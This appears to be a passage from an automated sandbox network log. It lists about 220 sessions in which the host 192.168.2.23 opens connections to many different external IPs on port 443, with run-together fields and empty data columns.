                                                21054192.168.2.2339142191.249.232.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21055192.168.2.234741683.251.167.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21056192.168.2.2349172189.187.118.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21057192.168.2.235545034.48.238.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21058192.168.2.233878066.100.82.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21059192.168.2.234248667.52.207.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21060192.168.2.233374664.157.101.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21061192.168.2.2358926113.21.82.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21062192.168.2.234994663.248.21.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21063192.168.2.2338996221.198.86.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21064192.168.2.2342094172.203.193.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21065192.168.2.23495524.94.188.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21066192.168.2.235597842.10.136.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21067192.168.2.2358100187.113.210.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21068192.168.2.2359322200.11.112.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21069192.168.2.2348258135.19.26.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21070192.168.2.2347436112.46.54.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21071192.168.2.2356638195.168.136.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21072192.168.2.2353332207.6.116.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21073192.168.2.233788884.113.132.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21074192.168.2.2334976219.204.44.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21075192.168.2.234970654.23.241.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21076192.168.2.2359448116.167.144.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21077192.168.2.2339824109.51.83.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21078192.168.2.2353900146.238.242.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21079192.168.2.23367484.75.168.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21080192.168.2.235280275.24.188.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21081192.168.2.2350382212.109.110.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21082192.168.2.233533024.196.92.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21083192.168.2.235295836.178.246.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21084192.168.2.2343444137.42.50.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21085192.168.2.235492465.204.134.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21086192.168.2.234738665.48.98.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21087192.168.2.2355934149.228.147.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21088192.168.2.2356138204.178.130.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21089192.168.2.235163457.232.196.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21090192.168.2.2350100125.1.90.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21091192.168.2.2345818152.179.244.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21092192.168.2.235531813.89.162.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21093192.168.2.2342604165.240.218.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21094192.168.2.2336738222.162.126.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21095192.168.2.235401678.74.103.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21096192.168.2.2354612203.50.70.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21097192.168.2.234334073.194.49.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21098192.168.2.235267823.201.126.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21099192.168.2.2345062195.48.246.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21100192.168.2.2341704210.148.231.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21101192.168.2.2342820101.168.2.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21102192.168.2.2355076201.128.120.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21103192.168.2.2357998213.22.15.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21104192.168.2.2353942118.140.116.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21105192.168.2.2342558138.237.115.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21106192.168.2.2343442120.128.36.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21107192.168.2.233290498.76.10.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21108192.168.2.2357266152.67.100.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21109192.168.2.2345656174.0.201.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21110192.168.2.2342322188.83.184.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21111192.168.2.2340114140.79.74.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21112192.168.2.234211674.23.126.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21113192.168.2.2341090139.183.0.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21114192.168.2.2338542219.200.17.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21115192.168.2.2358718223.90.46.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21116192.168.2.2341186122.155.56.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21117192.168.2.235942618.200.86.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21118192.168.2.233777487.186.105.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21119192.168.2.2333118179.106.206.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21120192.168.2.2336524166.212.255.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21121192.168.2.2339752198.5.189.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21122192.168.2.234636099.125.0.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21123192.168.2.2338326122.156.9.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21124192.168.2.2355232157.164.133.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21125192.168.2.23595202.19.112.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21126192.168.2.2347044223.191.208.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21127192.168.2.236016050.96.115.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21128192.168.2.234647239.52.178.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21129192.168.2.234481227.182.115.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21130192.168.2.2353788202.127.14.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21131192.168.2.233937858.113.224.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21132192.168.2.2355172129.46.247.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21133192.168.2.235626663.97.216.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21134192.168.2.233520299.187.54.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21135192.168.2.2350804199.40.215.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21136192.168.2.236061288.150.112.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21137192.168.2.234426268.6.97.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21138192.168.2.2357562117.99.215.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21139192.168.2.233605273.153.227.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21140192.168.2.2348536135.85.16.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21141192.168.2.2353618162.124.118.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21142192.168.2.2347410152.124.69.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21143192.168.2.2344320115.131.119.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21144192.168.2.2353590199.223.86.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21145192.168.2.233416270.95.47.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21146192.168.2.234186272.6.21.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21147192.168.2.234652825.25.86.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21148192.168.2.2345506179.141.22.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21149192.168.2.235821017.13.227.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21150192.168.2.234051686.140.205.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21151192.168.2.2346194140.106.75.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21152192.168.2.2353682186.51.142.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21153192.168.2.2332814204.89.223.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21154192.168.2.2348532130.96.1.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21155192.168.2.236080884.19.150.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21156192.168.2.2340856140.220.189.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21157192.168.2.2333878205.67.52.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21158192.168.2.234930869.57.68.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21159192.168.2.2358632179.172.146.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21160192.168.2.234792688.152.18.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21161192.168.2.234580283.19.105.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21162192.168.2.2339202187.242.99.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21163192.168.2.2360188207.36.120.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21164192.168.2.2346944119.13.204.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21165192.168.2.235744862.250.97.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21166192.168.2.2346370162.230.245.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21167192.168.2.2341636162.247.223.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21168192.168.2.23599989.124.2.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21169192.168.2.2349280150.14.127.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21170192.168.2.2343686143.250.174.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21171192.168.2.233535835.8.79.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21172192.168.2.2352954137.2.226.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21173192.168.2.2347244209.31.104.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21174192.168.2.233884691.185.151.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21175192.168.2.2357886187.210.229.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21176192.168.2.2350260218.32.213.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21177192.168.2.2347796153.129.73.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21178192.168.2.2343328191.153.106.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21179192.168.2.234980051.25.83.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21180192.168.2.2351642209.61.64.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21181192.168.2.2339388191.111.155.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21182192.168.2.2360754204.3.216.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21183192.168.2.2339372104.246.124.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21184192.168.2.2337726145.8.228.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21185192.168.2.2342210197.116.98.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21186192.168.2.2348648107.56.40.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21187192.168.2.234528027.132.163.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21188192.168.2.233997082.36.208.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21189192.168.2.234067254.26.103.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21190192.168.2.2352550114.191.163.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21191192.168.2.2353364113.31.82.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21192192.168.2.2334644206.56.8.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21193192.168.2.2360072181.122.14.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21194192.168.2.2345190188.238.85.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21195192.168.2.2349752141.129.5.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21196192.168.2.2342998168.66.192.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21197192.168.2.2335648128.165.162.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21198192.168.2.2340696191.94.149.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21199192.168.2.234813644.222.119.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21200192.168.2.2351358160.255.86.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21201192.168.2.2358448181.218.130.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21202192.168.2.2342710111.159.160.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21203192.168.2.2340000125.55.84.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21204192.168.2.2359222117.94.143.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21205192.168.2.233576452.82.143.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21206192.168.2.235694213.60.236.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21207192.168.2.2343058112.230.143.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21208192.168.2.2340560175.249.93.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21209192.168.2.2352034220.34.227.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21210192.168.2.2348090126.86.154.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21211192.168.2.235004014.23.102.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21212192.168.2.2340362159.221.185.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21213192.168.2.2341412141.142.63.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21214192.168.2.2335618187.127.10.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21215192.168.2.2347304165.77.159.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21216192.168.2.234106887.26.148.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21217192.168.2.2347638191.77.12.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21218192.168.2.2336824155.203.198.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21219192.168.2.2344012171.228.110.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21220192.168.2.2344294104.109.60.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21221192.168.2.2341622149.244.199.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21222192.168.2.2349142209.193.231.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21223192.168.2.235158020.70.206.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21224192.168.2.2355796211.154.53.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21225192.168.2.234698067.111.109.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21226192.168.2.2359222122.224.200.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21227192.168.2.233590679.101.214.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21228192.168.2.23508389.18.226.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21229192.168.2.2339208147.213.236.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21230192.168.2.2333496198.89.117.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21231192.168.2.234094644.182.236.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21232192.168.2.235576072.100.19.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21233192.168.2.2356948150.215.69.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21234192.168.2.234617632.148.188.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21235192.168.2.235621668.226.23.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21236192.168.2.236086287.131.183.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21237192.168.2.2334224179.201.75.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21238192.168.2.23372145.231.234.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21239192.168.2.2333152170.101.36.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21240192.168.2.2342248156.129.69.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21241192.168.2.235646852.139.49.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21242192.168.2.2357250176.8.194.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21243192.168.2.2350740143.70.104.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21244192.168.2.234722279.28.242.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21245192.168.2.2335672109.158.82.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21246192.168.2.2348010152.141.193.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21247192.168.2.2354400190.38.106.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21248192.168.2.2354660134.70.145.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21249192.168.2.2346554193.104.58.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21250192.168.2.2335360149.69.67.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21251192.168.2.2335692193.64.71.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21252192.168.2.234268213.187.45.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21253192.168.2.2343534128.213.178.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21254192.168.2.235707893.190.131.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21255192.168.2.2351504183.14.34.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21256192.168.2.2335312108.161.248.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21257192.168.2.234137450.131.91.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21258192.168.2.234640624.158.202.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21259192.168.2.234586276.175.216.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21260192.168.2.233743860.227.142.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21261192.168.2.2355228207.10.241.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21262192.168.2.2358056117.4.242.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21263192.168.2.236065860.109.12.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21264192.168.2.2360768193.159.159.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21265192.168.2.2334364130.222.72.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21266192.168.2.2359656112.90.196.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21267192.168.2.234973494.239.9.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21268192.168.2.234520612.238.113.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21269192.168.2.235698241.66.231.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21270192.168.2.235545442.134.37.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21271192.168.2.235082668.19.37.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21272192.168.2.235310637.166.109.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21273192.168.2.2356800203.92.114.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21274192.168.2.2341672153.198.40.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21275192.168.2.2333208144.49.17.47443
                                                TimestampBytes transferredDirectionData


